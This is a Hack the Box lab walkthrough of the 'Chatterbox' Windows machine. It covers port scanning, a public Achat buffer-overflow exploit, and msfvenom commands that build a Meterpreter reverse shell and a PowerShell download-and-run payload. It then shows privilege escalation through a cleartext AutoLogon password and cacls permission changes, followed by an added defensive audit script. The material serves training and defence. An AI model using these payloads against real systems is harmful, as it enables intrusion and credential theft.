Hack the Box – Chatterbox Walkthrough

Today, we’re going to solve another CTF machine, “Chatterbox”. It is now a retired box and is accessible to VIP members.


• Target OS: Windows
• Services: 9255, 9256
• IP Address:
• Difficulty: Medium


• Getting user
• Getting root


As always, the first step is the reconnaissance phase, starting with port scanning.

Port Scanning

During this step, we identify which services are running behind the target IP address.

nmap -p 1-65535 -T4 -A -v

Enumerating Port 9255

Nmap reveals an Achat service running over HTTP.

We got nothing useful here, so let’s move on.

Enumerating Port 9256

We know an Achat application is installed. To find its version we could try banner grabbing, but in this case it didn’t work.

Let’s run searchsploit achat.

Exploit: Achat 0.150 beta7 – Remote Buffer Overflow

searchsploit -m exploits/windows/remote/36025.py

Let’s edit our exploit.


Method #1

Let’s create our payload first and insert it into the exploit.

msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=1337 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

We executed the exploit and started listening for our reverse shell.

The reverse shell kept getting closed, so we had Metasploit migrate automatically on execution.

set AutoRunScript post/windows/manage/migrate

System Information

Method #2

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).DownloadString('')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

However, the Metasploit shell is much more convenient.

The user flag can be found at C:\Users\Alfred\Desktop\user.txt.

Privilege Escalation

Let’s start with basic privilege-escalation enumeration.

Running the PowerUp.ps1 script as part of basic privilege-escalation enumeration revealed AutoLogon credentials stored in the registry.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

DefaultUserName: Alfred
DefaultPassword: Welcome1!

The password might be reused for the Administrator account. But since we already have read access to the Administrator directory as user Alfred (see the screenshot below), we don’t need to try it.

We can change the permissions on root.txt using cacls.

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                               CHATTERBOX\Administrator:(OI)(CI)(ID)F
                               BUILTIN\Administrators:(OI)(CI)(ID)F
                               CHATTERBOX\Alfred:(OI)(CI)(ID)F

C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r
Are you sure (Y/N)?y
processed file: C:\Users\Administrator\Desktop\root.txt

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Alfred:R
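Both privilege-escalation weaknesses on this box (the cleartext AutoLogon password PowerUp pulled from the registry, and a non-admin user holding inherited Full control on the Administrator profile) can be checked by an administrator with a short audit script. The following is an added example, not part of the walkthrough and not PowerUp's code; the profile path, and the list of principals expected to hold Full control, are assumptions to adjust for your own hosts.

```powershell
# Added audit script for the two findings above (not from the walkthrough).
$winlogon   = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$profileDir = 'C:\Users\Administrator'   # assumption: profile to audit

function Test-AutoLogonPassword {
    param([string]$KeyPath = $winlogon)
    $props = Get-ItemProperty -Path $KeyPath -ErrorAction SilentlyContinue
    if ($null -eq $props) { return $null }
    # DefaultPassword under HKLM is readable by any local user; this is the
    # value PowerUp reported on Chatterbox (DefaultUserName/DefaultPassword).
    if ($props.PSObject.Properties.Name -contains 'DefaultPassword') {
        return [pscustomobject]@{
            Finding  = 'Cleartext AutoLogon password in registry'
            UserName = $props.DefaultUserName
            Enabled  = ($props.AutoAdminLogon -eq '1')
            Fix      = 'Remove DefaultPassword; use LSA secret or disable AutoLogon'
        }
    }
    return $null
}

function Get-UnexpectedFullControl {
    param([string]$Path = $profileDir)
    # Assumption: only these principals, plus the profile owner, should have F.
    $expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    $owner    = Split-Path -Leaf $Path
    $full     = [int][System.Security.AccessControl.FileSystemRights]::FullControl
    $acl      = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        $id     = $ace.IdentityReference.Value
        $isFull = (([int]$ace.FileSystemRights) -band $full) -eq $full
        if ($ace.AccessControlType -eq 'Allow' -and $isFull -and
            $expected -notcontains $id -and $id -notlike "*\$owner") {
            # An inherited ACE here corresponds to the (ID) flag in cacls
            # output, e.g. CHATTERBOX\Alfred:(OI)(CI)(ID)F on this box.
            [pscustomobject]@{
                Finding   = 'Unexpected Full control on profile directory'
                Path      = $Path
                Identity  = $id
                Inherited = $ace.IsInherited
            }
        }
    }
}

Test-AutoLogonPassword
Get-UnexpectedFullControl
```

Run it in an elevated PowerShell session; an empty result from both functions means neither weakness is present on the audited profile.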